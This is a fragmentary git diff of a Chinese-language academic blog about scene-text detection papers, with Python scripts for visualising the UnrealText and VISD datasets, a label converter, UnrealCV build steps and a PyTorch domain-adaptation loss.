    "text": ["[Mondial]", "\u092d\u0942\u0935\u093f\u091c\u094d\u091e\u093e\u0928\u0940\u0913\u0901", "\u0926\u0928\u093f\u092f\u093e\u0932", "1011)",

    ......

    , "31,438", "6/8/2006", "\u0646\u0628\u064a\u0644", "\u0646\u0627\u0637\u0642\u062a\u0627\u0646", "\u0645\u0647", "\u092e\u0948\u091f\u0930\u0928\u093f\u0916", "\u0935\u093f\u091a\u0947\u091c", "\u091b\u093f\u091c\u093c"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

    感觉只能处理一定的光照和透视,不是很好地适应模型表面的纹理。使用 Unicode 字符编码处理非拉丁文本。

    可视化

    写了个代码对这个数据集进行可视化,感觉 bboxcbox 的属性是完全一样的?(有的数据集中 bbox 是按行分类,cbox 是按字分割)

    -
    import cv2
    import os
    import matplotlib.pyplot as plt
    import json
    import numpy as np

    index = 93

    image_dir = r'E:\dataset\UnrealText\sub_103\imgs\\'
    label_dir = r'E:\dataset\UnrealText\sub_103\labels\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.json')

    image_origin = cv2.imread(image_path)
    image_bbox = image_origin.copy()
    image_cbox = image_origin.copy()
    height, width, _ = image_origin.shape

    with open(label_path, 'r') as f:
    data = json.load(f)

    for i, b in enumerate(data['bbox']):
    points = np.array([b[i:i+2] for i in range(0, len(b), 2)])
    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image_bbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

    for i, c in enumerate(data['cbox']):
    points = np.array([c[i:i+2] for i in range(0, len(c), 2)])
    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    # cv2.putText(image_cbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    # min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))


    fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('bbox')

    axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
    axes[2].axis('off')
    axes[2].set_title('cbox')

    plt.tight_layout()
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    import cv2
    import os
    import matplotlib.pyplot as plt
    import json
    import numpy as np

    index = 93

    image_dir = r'E:\dataset\UnrealText\sub_103\imgs\\'
    label_dir = r'E:\dataset\UnrealText\sub_103\labels\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.json')

    image_origin = cv2.imread(image_path)
    image_bbox = image_origin.copy()
    image_cbox = image_origin.copy()
    height, width, _ = image_origin.shape

    with open(label_path, 'r') as f:
    data = json.load(f)

    for i, b in enumerate(data['bbox']):
    points = np.array([b[i:i+2] for i in range(0, len(b), 2)])
    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image_bbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

    for i, c in enumerate(data['cbox']):
    points = np.array([c[i:i+2] for i in range(0, len(c), 2)])
    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    # cv2.putText(image_cbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    # min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))


    fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('bbox')

    axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
    axes[2].axis('off')
    axes[2].set_title('cbox')

    plt.tight_layout()
    plt.show()

    png

    UE 演示项目

    @@ -730,10 +728,10 @@

    运行

    unrealcv/unrealcv at 4.22 (github.com) 下载 UnrealCV 源码(4.16 以上版本没有 Release 的下载,要自行编译,仓库里一定要选择 4.22 版本的,不然会寄):

    jpg

    命令行下编译 UnrealCV 插件:

    -
    conda create -n unreal python=3.9
    conda activate unreal
    cd 下载仓库的目录
    python build.py
    +
    1
    2
    3
    4
    conda create -n unreal python=3.9
    conda activate unreal
    cd 下载仓库的目录
    python build.py

    编译得到文件:

    jpg

    -
    BUILD SUCCESSFUL
    AutomationTool exiting with ExitCode=0 (Success)
    +
    1
    2
    BUILD SUCCESSFUL
    AutomationTool exiting with ExitCode=0 (Success)

    Link 下载得到演示项目:DemoProject.tar_5.gz,解压得到 Demo Project:

    jpg

    Plugins,把之前编译好的 UnrealCV 插件替换过去。

    @@ -956,6 +954,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Unsupervised Domain Adaptation by Backpropagation/index.html b/posts/Paper-Unsupervised Domain Adaptation by Backpropagation/index.html index 90b3099eb8..8f2a69e5f7 100644 --- a/posts/Paper-Unsupervised Domain Adaptation by Backpropagation/index.html +++ b/posts/Paper-Unsupervised Domain Adaptation by Backpropagation/index.html @@ -44,8 +44,6 @@ - - @@ -4400,6 +4398,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/index.html b/posts/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/index.html index 5488c7e8bb..d0e9322b02 100644 --- a/posts/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/index.html +++ b/posts/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/index.html @@ -44,8 +44,6 @@ - - @@ -788,6 +786,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/index.html b/posts/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/index.html index f397d7a901..6a98676dd7 100644 --- a/posts/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/index.html +++ b/posts/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/index.html @@ -44,8 +44,6 @@ - - @@ -525,10 +523,10 @@

    6 Conclusions

    7 Acknowledgement

    项目资助。

    数据集可视化

    -
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 987

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'

    image_path = os.path.join(image_dir, '1image_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, '1image_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 987

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'

    image_path = os.path.join(image_dir, '1image_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, '1image_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    转换成 MindOCR 可读取的格式

    -
    import os
    import numpy as np

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'
    save_dir = r'D:\dataset\VISD\10K\\'
    save_file = "train_det_gt.txt"

    string = ""

    for label_file in os.listdir(label_dir):
    print('------', label_file, '------')

    index = int(label_file.split('_')[1].split('.')[0])

    image_file = label_file.split('.')[0] + '.jpg'
    label_path = os.path.join(label_dir, label_file)

    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    string += image_file
    string += "\t["

    for i, annotation in enumerate(annotations):
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    string += '{"transcription": "'
    string += transcriptions
    string += '", "points": ['
    for j, point in enumerate(points):
    string += "["
    string += str(point[0])
    string += ", "
    string += str(point[1])
    if j != len(points) - 1:
    string += "], "
    else:
    string += "]]}"
    if i != len(annotations) - 1:
    string += ", "
    string += ']\n'
    # print(string)

    with open(os.path.join(save_dir, save_file), 'w') as file:
    file.write(string)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import os
    import numpy as np

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'
    save_dir = r'D:\dataset\VISD\10K\\'
    save_file = "train_det_gt.txt"

    string = ""

    for label_file in os.listdir(label_dir):
    print('------', label_file, '------')

    index = int(label_file.split('_')[1].split('.')[0])

    image_file = label_file.split('.')[0] + '.jpg'
    label_path = os.path.join(label_dir, label_file)

    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    string += image_file
    string += "\t["

    for i, annotation in enumerate(annotations):
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    string += '{"transcription": "'
    string += transcriptions
    string += '", "points": ['
    for j, point in enumerate(points):
    string += "["
    string += str(point[0])
    string += ", "
    string += str(point[1])
    if j != len(points) - 1:
    string += "], "
    else:
    string += "]]}"
    if i != len(annotations) - 1:
    string += ", "
    string += ']\n'
    # print(string)

    with open(os.path.join(save_dir, save_file), 'w') as file:
    file.write(string)
    @@ -746,6 +744,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-YOLOv7-Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors/index.html b/posts/Paper-YOLOv7-Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors/index.html index 89bed27631..6dac7d0548 100644 --- a/posts/Paper-YOLOv7-Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors/index.html +++ b/posts/Paper-YOLOv7-Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors/index.html @@ -44,8 +44,6 @@ - - @@ -702,6 +700,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\346\221\230\346\212\204\344\270\200\344\270\213\345\205\266\344\273\226\350\256\272\346\226\207/index.html" "b/posts/Paper-\346\221\230\346\212\204\344\270\200\344\270\213\345\205\266\344\273\226\350\256\272\346\226\207/index.html" index a63df4587f..6b54fb249a 100644 --- "a/posts/Paper-\346\221\230\346\212\204\344\270\200\344\270\213\345\205\266\344\273\226\350\256\272\346\226\207/index.html" +++ "b/posts/Paper-\346\221\230\346\212\204\344\270\200\344\270\213\345\205\266\344\273\226\350\256\272\346\226\207/index.html" @@ -44,8 +44,6 @@ - - @@ -627,6 +625,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\346\225\264\347\220\206\344\270\213\350\277\231\346\256\265\346\227\266\351\227\264\347\234\213\347\232\204\350\256\272\346\226\207/index.html" "b/posts/Paper-\346\225\264\347\220\206\344\270\213\350\277\231\346\256\265\346\227\266\351\227\264\347\234\213\347\232\204\350\256\272\346\226\207/index.html" index d9bb8b0250..eb0c30df38 100644 --- "a/posts/Paper-\346\225\264\347\220\206\344\270\213\350\277\231\346\256\265\346\227\266\351\227\264\347\234\213\347\232\204\350\256\272\346\226\207/index.html" +++ "b/posts/Paper-\346\225\264\347\220\206\344\270\213\350\277\231\346\256\265\346\227\266\351\227\264\347\234\213\347\232\204\350\256\272\346\226\207/index.html" @@ -44,8 +44,6 @@ - - @@ -920,6 +918,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\346\241\245\350\276\271\347\272\242\350\215\257\347\232\204\350\256\272\346\226\207/index.html" "b/posts/Paper-\346\241\245\350\276\271\347\272\242\350\215\257\347\232\204\350\256\272\346\226\207/index.html" index 25ac3e94e4..5469756e1c 100644 --- "a/posts/Paper-\346\241\245\350\276\271\347\272\242\350\215\257\347\232\204\350\256\272\346\226\207/index.html" +++ "b/posts/Paper-\346\241\245\350\276\271\347\272\242\350\215\257\347\232\204\350\256\272\346\226\207/index.html" @@ -44,8 +44,6 @@ - - @@ -627,6 +625,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\347\234\213\344\270\200\347\234\213\342\200\234\346\260\264\350\256\272\346\226\207\347\232\204\347\250\213\345\272\217\347\214\277\342\200\235\347\232\204\350\256\272\346\226\207/index.html" "b/posts/Paper-\347\234\213\344\270\200\347\234\213\342\200\234\346\260\264\350\256\272\346\226\207\347\232\204\347\250\213\345\272\217\347\214\277\342\200\235\347\232\204\350\256\272\346\226\207/index.html" index 84e0693281..8b375714b1 100644 --- "a/posts/Paper-\347\234\213\344\270\200\347\234\213\342\200\234\346\260\264\350\256\272\346\226\207\347\232\204\347\250\213\345\272\217\347\214\277\342\200\235\347\232\204\350\256\272\346\226\207/index.html" +++ "b/posts/Paper-\347\234\213\344\270\200\347\234\213\342\200\234\346\260\264\350\256\272\346\226\207\347\232\204\347\250\213\345\272\217\347\214\277\342\200\235\347\232\204\350\256\272\346\226\207/index.html" @@ -44,8 +44,6 @@ - - @@ -717,6 +715,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\347\234\213\344\270\200\347\234\213\345\270\210\345\205\204\345\270\210\345\247\220\344\273\254\345\206\231\347\232\204\350\256\272\346\226\207/index.html" "b/posts/Paper-\347\234\213\344\270\200\347\234\213\345\270\210\345\205\204\345\270\210\345\247\220\344\273\254\345\206\231\347\232\204\350\256\272\346\226\207/index.html" index f571121d0c..06bc6dbb86 100644 --- "a/posts/Paper-\347\234\213\344\270\200\347\234\213\345\270\210\345\205\204\345\270\210\345\247\220\344\273\254\345\206\231\347\232\204\350\256\272\346\226\207/index.html" +++ "b/posts/Paper-\347\234\213\344\270\200\347\234\213\345\270\210\345\205\204\345\270\210\345\247\220\344\273\254\345\206\231\347\232\204\350\256\272\346\226\207/index.html" @@ -44,8 +44,6 @@ - - @@ -627,6 +625,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\347\254\254 5 \345\221\250\346\225\264\347\220\206\344\270\213\350\256\272\346\226\207\357\274\214\345\210\266\345\256\232\344\270\213\345\255\246\344\271\240\350\256\241\345\210\222/index.html" "b/posts/Paper-\347\254\254 5 \345\221\250\346\225\264\347\220\206\344\270\213\350\256\272\346\226\207\357\274\214\345\210\266\345\256\232\344\270\213\345\255\246\344\271\240\350\256\241\345\210\222/index.html" index b240344cd3..90d6ba1fed 100644 --- "a/posts/Paper-\347\254\254 5 \345\221\250\346\225\264\347\220\206\344\270\213\350\256\272\346\226\207\357\274\214\345\210\266\345\256\232\344\270\213\345\255\246\344\271\240\350\256\241\345\210\222/index.html" +++ "b/posts/Paper-\347\254\254 5 \345\221\250\346\225\264\347\220\206\344\270\213\350\256\272\346\226\207\357\274\214\345\210\266\345\256\232\344\270\213\345\255\246\344\271\240\350\256\241\345\210\222/index.html" @@ -44,8 +44,6 @@ - - @@ -1033,6 +1031,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\347\254\254 6 \345\221\250\345\222\214\347\254\254 7 \345\221\250\344\271\237\346\230\257\350\242\253\350\246\201\346\261\202\347\234\213\350\256\272\346\226\207\347\204\266\345\220\216\347\234\213\344\270\215\346\207\202\347\232\204\344\270\244\345\221\250/index.html" "b/posts/Paper-\347\254\254 6 \345\221\250\345\222\214\347\254\254 7 \345\221\250\344\271\237\346\230\257\350\242\253\350\246\201\346\261\202\347\234\213\350\256\272\346\226\207\347\204\266\345\220\216\347\234\213\344\270\215\346\207\202\347\232\204\344\270\244\345\221\250/index.html" index 9e1d055caf..3ad53c0784 100644 --- "a/posts/Paper-\347\254\254 6 \345\221\250\345\222\214\347\254\254 7 \345\221\250\344\271\237\346\230\257\350\242\253\350\246\201\346\261\202\347\234\213\350\256\272\346\226\207\347\204\266\345\220\216\347\234\213\344\270\215\346\207\202\347\232\204\344\270\244\345\221\250/index.html" +++ "b/posts/Paper-\347\254\254 6 \345\221\250\345\222\214\347\254\254 7 \345\221\250\344\271\237\346\230\257\350\242\253\350\246\201\346\261\202\347\234\213\350\256\272\346\226\207\347\204\266\345\220\216\347\234\213\344\270\215\346\207\202\347\232\204\344\270\244\345\221\250/index.html" @@ -44,8 +44,6 @@ - - @@ -508,7 +506,7 @@

    内容

    感觉比较牛逼就读的仔细一些的

    ​ 这些都发了独立的推文,也列出来吧。

    Paper-Text Recognition in the Wild-A Survey

    -

    见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…/…/…/…/2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

    +

    见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…//Paper-Text Recognition in the Wild-A Survey/)

    导师要求看的

    SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition

    资源

    @@ -653,7 +651,7 @@

    内容

    YOLO9000-Better, Faster, Stronger

    VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations

    -

    见:[Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations-Zi-Zi’s Journey](…/…/…/…/2023/04/05/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/)

    +

    见:[Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations-Zi-Zi’s Journey](…//Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/)

    想看的

    • HENet: Forcing a Network to Think More for Font Recognition | Papers With Code
    • @@ -877,6 +875,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\347\273\204\344\274\232\346\261\207\346\212\245/index.html" "b/posts/Paper-\347\273\204\344\274\232\346\261\207\346\212\245/index.html" index f618958799..32eec7f3e0 100644 --- "a/posts/Paper-\347\273\204\344\274\232\346\261\207\346\212\245/index.html" +++ "b/posts/Paper-\347\273\204\344\274\232\346\261\207\346\212\245/index.html" @@ -44,8 +44,6 @@ - - @@ -400,7 +398,7 @@

      Paper-组会汇报

      @@ -837,6 +835,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\351\207\215\350\257\273-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html" "b/posts/Paper-\351\207\215\350\257\273-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html" index 15166c5b76..903d26442f 100644 --- "a/posts/Paper-\351\207\215\350\257\273-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html" +++ "b/posts/Paper-\351\207\215\350\257\273-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html" @@ -44,8 +44,6 @@ - - @@ -451,7 +449,7 @@

      3.

      3.2 Adversarial Text Instance Alignment

      ​ 受 [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,采用 ATA 来帮助网络学习域不变特征。在 EAST 模型中,图像特征 $P(I)$ 是指主干的特征图输出(即,384,图 2 中的 1/32 特征)。为了在源域和目标域之间对齐特征 $P(I)$,使用域分类器来混淆特征域。具体地,针对每个输入图像训练域分类器,并预测图像所属的域标签(代码中 y_pred_prob_f)。我们假设模型的输入样本为 $x\in X$,其中 $X$ 是某个输入空间。$y_i$ 表示第 $i$ 个训练图像的域标签(代码中 y_true),对于源域 $y_i=0$,对于目标域 $y_i = 1$。$p_i(x)$ 是域分类器的输出,我们使用交叉熵作为损失函数:

      $$L_d=-\sum_i(y_i\times ln^{p_i(x)}+(1-y_i)\times ln^{1-p_i(x)})$$

      -
      def bce_loss(y_true, y_pred_logits):
      # y_true:真实标签(0 或 1)。
      # y_pred_logits:模型的原始预测值(logits),即未经过激活函数的输出。
      # y_pred_prob = F.sigmoid(y_pred_logits)
      # y_true_f = y_true.view(-1)
      # y_true_f = y_true
      y_pred_logits = y_pred_logits.view(-1)
      y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7) # 调整预测值范围:将预测值限制在 [1e-7, 1 - 1e-7] 之间,以防止对数计算时出现数值不稳定。
      return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean() # 计算交叉熵损失,并返回平均损失。
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      def bce_loss(y_true, y_pred_logits):
      # y_true:真实标签(0 或 1)。
      # y_pred_logits:模型的原始预测值(logits),即未经过激活函数的输出。
      # y_pred_prob = F.sigmoid(y_pred_logits)
      # y_true_f = y_true.view(-1)
      # y_true_f = y_true
      y_pred_logits = y_pred_logits.view(-1)
      y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7) # 调整预测值范围:将预测值限制在 [1e-7, 1 - 1e-7] 之间,以防止对数计算时出现数值不稳定。
      return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean() # 计算交叉熵损失,并返回平均损失。

      ​ 为了学习域不变特征,我们以对抗的方式优化参数。通过最小化上述域分类损失来优化域分类器的参数,并且通过最大化该损失来优化基础网络的参数。更详细地说,梯度反转层(GRL)被添加在 EAST 的主干和域分类器之间,当通过 GRL 层时,梯度的符号被反转(梯度反转层主要同在特征提取器与域分类器之间,那么在反向传播过程中,域分类器的域分类损失的梯度反向传播到特征提取器的参数之前会自动取反,进而实现了类似与 GAN 的对抗损失。)。如图 2 所示,特征金字塔网络(FPN)和骨干网在训练阶段都最小化了 EAST 的原始损失 $L_{task}$。$L_{task}$ 具体表示 EAST 中的评分图损失几何形状损失。$L^t_{task}$ 任务是指在目标域中使用伪标签进行训练,$L^s_{task}$ 任务表示在源域中进行训练。因此,不同参数空间的训练目标不同:

      $$\begin{cases}L_f=\min(L_{task}t(\theta_f|xt)+L_{task}s(\theta_f|xs)-\lambda L_d(\theta|(xs,xt)))&\theta_f\in F ,\L_d=\min(L_d(\theta_d|(xs,xt)))&\theta_d\in C ,\L_h=\min(L_{task}t(\theta_h|xt)+L_{task}s(\theta_h|xs))&\theta_h\in D ,\end{cases}$$

        @@ -461,11 +459,11 @@

        class Loss_target(nn.Module):
        def __init__(self, weight_angle=10):
        # 角度损失的权重系数。默认为 10,用于控制角度损失在总损失中的影响程度。
        super(Loss_target, self).__init__()
        self.weight_angle = weight_angle
        self.bce = bce_loss
        # 指定使用的二分类交叉熵损失函数 (bce_loss),它在 forward 方法中用来计算领域损失。

        def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map,pre_domain):
        if torch.sum(gt_score) < 1:
        return torch.sum(pred_score + pred_geo) * 0
        # 如果 gt_score 的总和小于 1(表示没有有效的目标),则返回 0 作为损失,避免计算损失时出现错误或不必要的计算。

        classify_loss = get_dice_loss(gt_score, pred_score*(1-ignored_map))
        # 使用 get_dice_loss 计算分类损失。pred_score * (1 - ignored_map) 是预测分数与忽略区域掩码结合后的结果,确保在计算损失时忽略掉指定的区域。

        gt_doamin = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
        doamin_loss = self.bce(gt_doamin, pre_domain)
        # 生成一个目标领域分数 gt_doamin,设为 1,并将其转移到 GPU 设备上。使用 bce_loss 计算领域损失,这里领域损失衡量模型预测的领域分数与目标领域分数之间的差异。

        iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)

        angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
        iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
        geo_loss = self.weight_angle * angle_loss + iou_loss
        # 使用 get_geo_loss 计算几何损失,包括交并比(IoU)损失和角度损失。
        # 计算角度损失和 IoU 损失,并根据 weight_angle 进行加权,得到总的几何损失。
        # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
        return geo_loss, classify_loss, doamin_loss # 返回三个损失值:几何损失、分类损失和领域损失。
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        class Loss_target(nn.Module):
        def __init__(self, weight_angle=10):
        # 角度损失的权重系数。默认为 10,用于控制角度损失在总损失中的影响程度。
        super(Loss_target, self).__init__()
        self.weight_angle = weight_angle
        self.bce = bce_loss
        # 指定使用的二分类交叉熵损失函数 (bce_loss),它在 forward 方法中用来计算领域损失。

        def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map,pre_domain):
